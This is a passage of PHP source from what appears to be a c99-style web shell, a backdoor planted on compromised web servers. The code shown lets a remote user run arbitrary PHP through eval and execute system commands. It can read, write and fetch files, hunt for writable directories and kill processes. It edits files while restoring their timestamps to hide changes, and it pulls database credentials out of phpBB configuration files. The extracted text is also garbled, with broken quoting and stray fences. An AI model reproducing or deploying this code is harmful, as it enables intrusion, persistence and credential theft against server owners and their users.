src=\"\". $surl."act=img&img=download\" alt=\"Download\" border=\"0\">
</a>&nbsp;". $checkbox;}
if (($o == ".") or ($o == "..")) {$stab["head"][] = $row;}
elseif (is_link($v)) {$stab["links"][] = $row;}
elseif (is_dir($v)) {$stab["folders"][] = $row;}
elseif (is_file($v)) {$stab["files"][] = $row;}
$i++;
}
}
// Compiling table
$table = array_merge($stab["cols"], $stab["head"], $stab["folders"], $stab["links"], $stab["files"]);
echo "<div>.: ";
if (!empty($yx_infohead)) { echo $yx_infohead; }
else { echo "Directory List (".$count($stab["files"])." files and "
(count($stab["folders"])+count($stab["links"]))." folders)"; }
echo " :.</div>\n";
echo "<form action=\"\". $surl.\"\" method=POST name=\"ls_form\"><input type=hidden

```



```

    echo "<option value=unselect".($dspact == "unselect"?
selected": "").">Unselect</option>";
}
echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
echo "</form>";
}
}
if ($act == "tools") //Define Yourself
{

}
if ($act == "phpfsys") {
echo "<div align=left>";
$fsfunc = $phpfsysfunc;
if ($fsfunc=="copy") {
    if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
    else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
}
elseif ($fsfunc=="rename") {
    if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
    else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
}
elseif ($fsfunc=="chmod") {
    if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
    else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
}
elseif ($fsfunc=="read") {
    $hasil = @file_get_contents($arg1);
    echo "<b>Filename:</b> $arg1<br>";
    echo "<textarea cols=150 rows=20>";
    echo $hasil;
    echo "</textarea>\n";
}
elseif ($fsfunc=="write") {
    if(@file_put_contents($d.$arg1,$arg2)) {
        echo "<b>Saved!</b> ".$d.$arg1;
    }
    else { echo "<div>Couldn't write to $arg1!</div>"; }
}
}

```

```

elseif ($fsfunc=="downloadbin") {
    $handle = fopen($arg1, "rb");
    $contents = "";
    while (!feof($handle)) {
        $contents .= fread($handle, 8192);
    }
    $r = @fopen($d.$arg2,'w');
    if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2."
(".view_size(filesize($d.$arg2)).)"; }
    else { echo "<div>Couldn't write to ".$d.$arg2."</div>"; }
    fclose($r);
    fclose($handle);
}
elseif ($fsfunc=="download") {
    $text = implode(" ", file($arg1));
    if ($text) {
        $r = @fopen($d.$arg2,'w');
        if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2."
(".view_size(filesize($d.$arg2)).)"; }
        else { echo "<div>Couldn't write to ".$d.$arg2."</div>"; }
        fclose($r);
    }
    else { echo "<div>Couldn't download from $arg1!</div>";}
}
elseif ($fsfunc=='mkdir') {
    $thedir = $d.$arg1;
    if ($thedir != $d) {
        if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
        elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
        else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
    }
    else { echo "Couldn't create current dir:<b> $thedir</b>"; }
}
elseif ($fsfunc=='writablemdir') {
    function recurse_dir($dir,$max_dir) {
        global $dir_count;
        $dir_count++;
        if( $cdir = @dir($dir) ) {
            while( $entry = $cdir-> read() ) {

```

```

if( $entry != '.' && $entry != '..' ) {
    if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
        if ($dir_count > $max_dir) { return; }
        echo "[".$dir_count."] ".$dir.$entry."\n";
        recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
    }
}
}
$cdir->close();
}
}
if (!$arg1) { $arg1 = $d; }
if (!$arg2) { $arg2 = 10; }
echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<br>";
echo "<pre>";
recurse_dir($arg1,$arg2);
echo "</pre>";
$total = $dir_count - 1;
echo "<b>Founds:</b> ".$total." of <b>Max</b> $arg2";
}
else {
    if (!$arg1) { echo "<div>No operation! Please fill parameter [A]!</div>\n"; }
    else {
        if ($hasil = $func($arg1)) {
            echo "<b>Result of $func $arg1:</b><br>";
            if (is_array($hasil)) { echo "$hasil\n"; }
            else {
                echo "<pre>";
                foreach ($hasil as $v) { echo $v."\n"; }
                echo "</pre>";
            }
        }
        else { echo "<div>$func $arg1 failed!</div>\n"; }
    }
}
echo "</div>\n";
}
if ($act == "processes") {
    echo "<div>.: Processes :.</div>";
}

```

```

if (!$win) { $handler = "ps -aux".($grep?" | grep "" .addslashes($grep)."" : ""); }
else { $handler = "tasklist"; }
$ret = myshellexec($handler);
if (!$ret) { echo "Can't execute \"\". $handler. \"\""; }
else {
    if (empty($processes_sort)) {$processes_sort = $sort_default;}
    $parsesort = parsesort($processes_sort);
    if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
    $k = $parsesort[0];
    if ($parsesort[1] != "a") {
        $y = "<a href=\"\". $surl. \"act=\". $dspact. \"&d=\". urlencode($d). \"&processes_sort=\". $k. \"a\">
<img src=\"\". $surl. \"act=img&img=sort_desc\" border=\"0\"></a>";
    }
    else {
        $y = "<a href=\"\". $surl. \"act=\". $dspact. \"&d=\". urlencode($d). \"&processes_sort=\". $k. \"d\">
<img src=\"\". $surl. \"act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
    }
    $ret = htmlspecialchars($ret);
    if (!$win) {
        if ($pid) {
            if (is_null($sig)) {$sig = 9;}
            echo "Sending signal \"$sig.\" to #\". $pid. \"... \";
            if (posix_kill($pid,$sig)) {echo "OK.";}
            else {echo "ERROR.";}
        }
        while (ereg(" ", $ret)) {$ret = str_replace(" ", " ", $ret);}
        $stack = explode("\n", $ret);
        $head = explode(" ", $stack[0]);
        unset($stack[0]);
        for($i=0;$i<count($head);$i++) {
            if ($i != $k) {$head[$i] = "<a
href=\"\". $surl. \"act=\". $dspact. \"&d=\". urlencode($d). \"&processes_sort=\". $i. $parsesort[1]. \"\">
<b>\". $head[$i]. \"</b></a>";}
        }
        $prcs = array();
        foreach ($stack as $line) {
            if (empty($line)) {
                echo "<tr>";
                $line = explode(" ", $line);
            }
        }
    }
}

```

```

$line[10] = join(" ",array_slice($line,10));
$line = array_slice($line,0,11);
if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
$line[] = "<a
href=\"\".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u>
</a>";
$prcs[] = $line;
echo "</tr>";
}
}
}
//For Windows - Fixed By FaTaLiStiCz_yx
else {
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg("=", $ret)) {$ret = str_replace("=", "", $ret);}
$ret = convert_cyr_string($ret,"d","w");
$stack = explode("\n",$ret);
unset($stack[0],$stack[2]);
$stack = array_values($stack);
$stack[0]=str_replace("Image Name","ImageName",$stack[0]);
$stack[0]=str_replace("Session Name","SessionName",$stack[0]);
$stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
$head = explode(" ",$stack[0]);
$stack = array_slice($stack, 1);
$head = array_values($head);
if ($parsesort[1] != "a") { $y = "<a
href=\"\".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img
src=\"\".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
else { $y = "<a
href=\"\".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img
src=\"\".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
if ($k > count($head)) {$k = count($head)-1;}
for($i=0;$i<count($head);$i++) {
if ($i != $k) { $head[$i] = "<a
href=\"\".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\">
<b>".trim($head[$i])."</b></a>"; }
}
$prcs = array();
unset($stack[0]);

```

```

foreach ($stack as $line) {
    if (!empty($line)) {
        $line = explode(" ", $line);
        $line[4] = str_replace(".", "", $line[4]);
        $line[4] = intval($line[4]) * 1024;
        unset($line[5]);
        $prcs[] = $line;
    }
}
$head[$k] = "<b>".$head[$k]."</b>".$y;
$v = $processes_sort[0];
usort($prcs, "tabsort");
if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
$tab = array();
$tab[] = $head;
$tab = array_merge($tab, $prcs);
echo "<table>";
foreach($tab as $i=>$k) {
    echo "<tr>";
    foreach($k as $j=>$v) {
        if ($win and $i > 0 and $j == 4) {$v = view_size($v);}
        echo "<td>".$v."</td>";
    }
    echo "</tr>";
}
echo "</table>";
}
}
if ($sact == "eval") {
    if (!empty($eval)) {
        echo "Result of execution this PHP-code:<br>";
        $tmp = ob_get_contents();
        $olddir = realpath(".");
        @chdir($d);
        if ($tmp) {
            ob_clean();
            eval($eval);
            $ret = ob_get_contents();

```

```

$ret = convert_cyr_string($ret,"d","w");
ob_clean();
echo $tmp;
if ($eval_txt) {
    $rows = count(explode("\r\n",$ret))+1;
    if ($rows < 10) {$rows = 10;}
    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."
</textarea>";
    }
    else {echo $ret."<br>";}
}
else {
    if ($eval_txt) {
        echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
        eval($eval);
        echo "</textarea>";
    }
    else {echo $ret;}
}
@chdir($olddir);
}
else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt))
{$eval_txt = TRUE;}}
echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval>
<textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input
type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit
value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\"
name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
}
if ($act == "f") {
    echo "<div align=left>";
    if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
        if (file_exists($d.$f)) {echo "<center><b>Permission denied (".htmlspecialchars($d.$f).")!</b>
</center>";}
        else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a
href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u>
</a></center>";}
    }
    else {

```



```

}
echo "<hr size=\\\"1\\\" noshade>";
if ($ft == "info") {
    echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td>
<b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td>
.view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td>
</tr>";
    if (!$win) {
        echo "<tr><td><b>Owner/Group</b></td><td> ";
        $ow = posix_getpwuid(fileowner($d.$f));
        $gr = posix_getgrgid(filegroup($d.$f));
        echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?
$gr["name"]:filegroup($d.$f));
    }
    echo "<tr><td><b>Perms</b></td><td><a
href=\\\"".$$surl."act=chmod&f=".$urlencode($f)."&d=".$urlencode($d). "\\\">.view_perms_color($d.$f
)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."
</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td>
</tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>
</table>";
    $fi = fopen($d.$f,"rb");
    if ($fi) {
        if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
        else {echo "<b>HEXDUMP PREVIEW</b>"; $str =
fread($fi,$hexdump_lines*$hexdump_rows);}
        $n = 0;
        $a0 = "00000000<br>";
        $a1 = "";
        $a2 = "";
        for ($i=0; $i<strlen($str); $i++) {
            $a1 .= sprintf("%02X",ord($str[$i]))." ";
            switch (ord($str[$i])) {
                case 0: $a2 .= "<font>0</font>"; break;
                case 32:
                case 10:
                case 13: $a2 .= "&nbsp;"; break;
                default: $a2 .= htmlspecialchars($str[$i]);
            }
            $n++;

```

```

if ($n == $hexdump_rows) {
    $n = 0;
    if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
    $a1 .= "<br>";
    $a2 .= "<br>";
}
}
echo "<table border=1 bgcolor=#666666>".
    "<tr><td bgcolor=#666666>".$a0."</td>".
    "<td bgcolor=#000000>".$a1."</td>".
    "<td bgcolor=#000000>".$a2."</td>".
    "</tr></table><br>";
}
$encoded = "";
if ($base64 == 1) {
    echo "<b>Base64 Encode</b><br>";
    $encoded = base64_encode(file_get_contents($d.$f));
}
elseif($base64 == 2) {
    echo "<b>Base64 Encode + Chunk</b><br>";
    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
}
elseif($base64 == 3) {
    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
    $encoded = base64_encode(file_get_contents($d.$f));
    $encoded = substr(preg_replace(".{1,76}!", "'\0'.\n", $encoded),0,-2);
}
elseif($base64 == 4) {
    $text = file_get_contents($d.$f);
    $encoded = base64_decode($text);
    echo "<b>Base64 Decode";
    if (base64_encode($encoded) != $text) {echo " (failed)";}
    echo "</b><br>";
}
if (!empty($encoded))
{
    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
}
echo "<b>HEXDUMP:</b><nobr> [<a

```

```

href="\\".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\\">Full</a
>] [<a href="\\".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\\">Preview</a>]
<br><b>Base64: </b>
    <nobr><a
href="\\".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\\">Encode</a>
]&nbsp;  </nobr>
    <nobr><a
href="\\".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\\">+chunk</a>]
&nbsp;  </nobr>
    <nobr><a
href="\\".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\\">+chunk+quo
tes</a>]&nbsp;  </nobr>
    <nobr><a
href="\\".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\\">Decode</a>
]&nbsp;  </nobr>
    <P>";
}
elseif ($ft == "html") {
    if ($white) {@ob_clean();}
    echo $r;
    if ($white) {c99shexit();}
}
elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
elseif ($ft == "phpsess") {
    echo "<pre>";
    $v = explode("|",$r);
    echo $v[0]."<br>";
    var_dump(unserialize($v[1]));
    echo "</pre>";
}
elseif ($ft == "exe") {
    $ext = explode(".", $f);
    $c = count($ext)-1;
    $ext = $ext[$c];
    $ext = strtolower($ext);
    $rft = "";
    foreach($sexetypes as $k=>$v)
    {

```

```

if (in_array($ext,$v)) {$rft = $k; break;}
}
$cmd = str_replace("%f%", $f, $rft);
echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden
name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"\".htmlspecialchars($cmd).\"\"
size=\"\".(strlen($cmd)+2).\"\"><br>Display in text-area<input type=\"checkbox\"
name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\"
value=\"\".htmlspecialchars($d).\"\"><br><input type=submit name=submit value=\"Execute\">
</form>";
}
elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "
</pre>";}
elseif ($ft == "code") {
if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
    $arr = explode("\n",$r);
    if (count($arr == 18)) {
        include($d.$f);
        echo "<b>phpBB configuration is detected in this file!<br>";
        if ($dbms == "mysql4") {$dbms = "mysql";}
        if ($dbms == "mysql") {echo "<a
href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars
($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspec
ialchars($dbname).\"\"><b><u>Connect to DB</u></b></a><br><br>";}
        else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms.\"
is not supported by ".$sh_name.". Please, report us for fix.";}
        echo "Parameters for manual connect:<br>";
        $cfgvars =
array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpass
wd"=>$dbpasswd);
        foreach ($cfgvars as $k=>$v) {echo
htmlspecialchars($k)."="."htmlspecialchars($v).\"\"<br>";}
        echo "</b><hr size=\"1\" noshade>";
    }
}
}
echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; 1em; 1em; 1em; 1em;
background-color: ".$highlight_background.";\>";
if (!empty($white)) {@ob_clean();}
highlight_file($d.$f);
if (!empty($white)) {c99shexit();}

```

```

    echo "</div>";
}
elseif ($ft == "download") {
    @ob_clean();
    header("Content-type: application/octet-stream");
    header("Content-length: ".filesize($d.$f));
    header("Content-disposition: attachment; filename=\"".$f."\";");
    echo $r;
    exit;
}
elseif ($ft == "notepad") {
    @ob_clean();
    header("Content-type: text/plain");
    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
    echo($r);
    exit;
}
elseif ($ft == "img") {
    $inf = getimagesize($d.$f);
    if (!$white) {
        if (empty($imgsize)) {$imgsize = 20;}
        $width = $inf[0]/100*$imgsize;
        $height = $inf[1]/100*$imgsize;
        echo "<center><b>Size:</b>&nbsp;";
        $sizes = array("100","50","20");
        foreach ($sizes as $v) {
            echo "<a
href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
            if ($imgsize != $v ) {echo $v;}
            else {echo "<u>".$v."</u>";}
            echo "</a>&nbsp;&nbsp;&nbsp;";
        }
        echo "<br><br><img
src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d).\""
width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
    }
    else {
        @ob_clean();
        $ext = explode($f,".");

```

```

    $ext = $ext[count($ext)-1];
    header("Content-type: ".$inf["mime"]);
    readfile($d.$f);
    exit;
}
}
elseif ($ft == "edit") {
    if (!empty($submit))
    {
        if ($filestealth) {$stat = stat($d.$f);}
        $fp = fopen($d.$f,"w");
        if (!$fp) {echo "<b>Can't write to file!</b>";}
        else
        {
            echo "<b>Saved!</b>";
            fwrite($fp,$edit_text);
            fclose($fp);
            if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
            $r = $edit_text;
        }
    }
    $rows = count(explode("\r\n",$r));
    if ($rows < 10) {$rows = 10;}
    if ($rows > 30) {$rows = 30;}
    echo "<form action=\"".$surl."act=f&f=".$urlencode($f)."&ft=edit&d=".$urlencode($d).""
method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\"
value=\"Reset\">&nbsp;<input type=\"button\"
onclick=\"location.href=\".addslashes($surl."act=ls&d=".substr($d,0,-1)).\".\" value=\"Back\">
<br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows.\">\".htmlspecialchars($r).\"
</textarea></form>";
}
elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is
mistake, please send us url and dump of \$_GLOBALS.</b></center>";}
else {echo "<center><b>Unknown extension (\".$ext.\"), please, select type manually.</b>
</center>";}
}
echo "</div>\n";
}
}
}

```

```
else {
@ob_clean();
$images = array(
"arrow_ltr"=>
"R0IGODIhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAlvjl+py+0PF4i0gVvzuV
xXDnoQSIrUZGZoeKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
"back"=>
"R0IGODIhFAAUAKIAAAAAAP///93d3cDAwlaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUA
BQAAAM8".
"aLrc/jDKSWWpjVysSNIYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mO
UEqt".
"Wg0JADs=",
"buffer"=>
"R0IGODIhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQ
AAANo".
"eLrcribG90y4F1Amu5+NhY2kxI2CMKwrQRSGuVjp4LmwDAWqiAGyxChg+xhnRB+ptLOhai1
crEmD".
"Dlww4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
"change"=>
"R0IGODIhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9LI/PX6/v3
+".
"/3eHt6q88eHu/ZkfH3yVyluQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA
".
"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54c
bRAoFyEOC".
"wSiUtmYkkrwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJa
XQGBQgA".
"CHkjE4aQkQ0AISITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsf
lxjDL".
"zMshADs=",
"delete"=>
"R0IGODIhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1yx19cwXOfDw8Kenp/n5+et
geunp".
"6dcGLMMpRurq6pKSkvtb2+/v7+1wh3R0dPnP17iAipxyel9yx7djcsSM93d3ZGRkeEsTevd4L
Cw".
"sGRkZGpOU+IfQ+EQNoh6fdlCpeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQY
mJifWv".
"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUIKYOP+Tk5N0oSufn57ZGWsQrR9kIL5CQkO
Pj42VI".
```

"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/IMK0t81rfd8AKf///wAA
".
"AA
AAAAAAAAAAAAAAAA".
"AA
AAAAAAAAAAAAACH5".
"BAEAAFkALAAAAAUABQAAAesgFmCg4SFhoelhiUfllmIMlgQB46GLAIYQkaFVVhSAIZLT5
cbEYI4".
"STo5MxOfhQwBA1gYChckQBk1OwilALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNW
DdMHA8G".
"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOljVZZABxQIWDBLkIE
QrRoQsHQ".
"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
"download"=>
"R0IGODIhFAAUALMIAAD/AACAAIAAAMDawH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAA
AAAAAA".
"AAAAACH5BAEAAAgALAAAAAUABQAAAROEMLJq704UyGOvkLhfVU4kpOJSpx5nF9YiCt
Lf0SuH7pu".
"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQIXTP38przWbX3qgIADs=",
"forward"=>
"R0IGODIhFAAUAPIAAAAAAP///93d3cDAwlaGhgQEBP///wAAACH5BAEAAAYALAAAAAU
BQAAAM8".
"aLrc/jDK2Qp9xv5WiN5G50FZaRLD6lhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0lqVw2I0
RQSEqt".
"WqsJADs=",
"home"=>
"R0IGODIhFAAUALMAAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAA
AAAAAA".
"AAAAACH5BAEAAAkALAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKOO
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wMGRkUg0xlf".

"1IAeBiEAGRgXEg0t4SwroCYIDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UM
oYASBiUQ".

"ADs=",

"ext_log"=>

"R0IGODIhEAAQADMAACH5BAEAAAgALAAAAAQABAAg///wAAAMDAwICAglCAAAAAGAA
AA////AAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJkILRAWzbCIRhrK
4Ly5yg7/wN".

"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMlgIAOW=

=",
"ext_php"=>
"R0IGODIhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZ
Mmd0OqpaGeyYpqJIRG/rlwAADs=",
"ext_pl"=>
"R0IGODIhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAAAACH5BAEAAAEALAAAAAA
UABQAQAMo".
"GLrc3gOAMYR4OOudreegRIBWSJ1lqK5s64LjWF3cQMjPjPjDf6//ABAA7",
"ext_swf"=>
"R0IGODIhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwA
AP8xAP/O".
"nAAAAP////////wAA
AAACH5BAEA".
"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKC
MGgoOm4QB4GA".
"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEyxXRpDGEIA4xAQQNR1NHoMEAACABFhlz
8rCncMAGgC".
"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
"ext_tar"=>
"R0IGODIhEAAQAGYAACH5BAEAAEsALAAAAAQABAahgAAABIOAFgdAFAAAIYCUwA8Z
wA8Z9DY4JIC".
"Wv///wCIWBE2AAAyUJicqISHI4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTlyMtTc5P//sfL5/8X
F".
"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELrzipf+V3nPA/40CUzmm/wA4XhV
DAAGD".
"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17
p".
"uo0GUQBWnP++8Lm5AP+j5QBUIACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA".
"AA
AAAAAAAAAAAA".
"AA
AAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzP
T4/AwcQCQkg".
"GwipqqkqAxlaFRgXDwO1trcAubq7vleJDiwhBcPExAyTISEZOzo5KTUxMCsvDKOISRschDw
eHkMd".
"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCliwXkZD2oR
3FB".

```
"u4tLAgEAOw==",
"ext_txt"=>
"R0IGODIhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAACH5BAEAAAQALAAAAA
TABAAAANJ".
"SArE3IDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmz
nlEup7".
"UpPWG3lg6Hq/XmRjuZwkAAA7",
"ext_wri"=>
"R0IGODIhEAAQADMAACH5BAEAAAgALAAAAAQABAAg///wAAAICAgMDAwICAAAAAgA
AA////AAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxst
wAAypduoao".
"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxyzW6nLdq49hIBADs=",
"ext_xml"=>
"R0IGODIhEAAQAEQAACH5BAEAABAALAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8
AAAmQAAgACA".
"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbES
BUFQwABICx".
"OAMxebThmA4EocatgnYKhaJhxUrlBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPK
EEQ".
"lQA7"
);
//Untuk optimalisasi ukuran dan kecepatan.
$imgequals = array(

"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2",
"ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk
","ext_rar","ext_uuf"),

"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_ht
m"),

"ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico
","ext_tif","tiff"),
"ext_html"=>array("ext_html","ext_htm"),
"ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
"ext_lnk"=>array("ext_lnk","ext_url"),
```

```

"ext_ini"=>array("ext_ini","ext_css","ext_inf"),
"ext_doc"=>array("ext_doc","ext_dot"),
"ext_js"=>array("ext_js","ext_vbs"),
"ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
"ext_wri"=>array("ext_wri","ext_rtf"),
"ext_swf"=>array("ext_swf","ext fla"),
"ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
"ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
);
if (!$getall) {
    header("Content-type: image/gif");
    header("Cache-control: public");
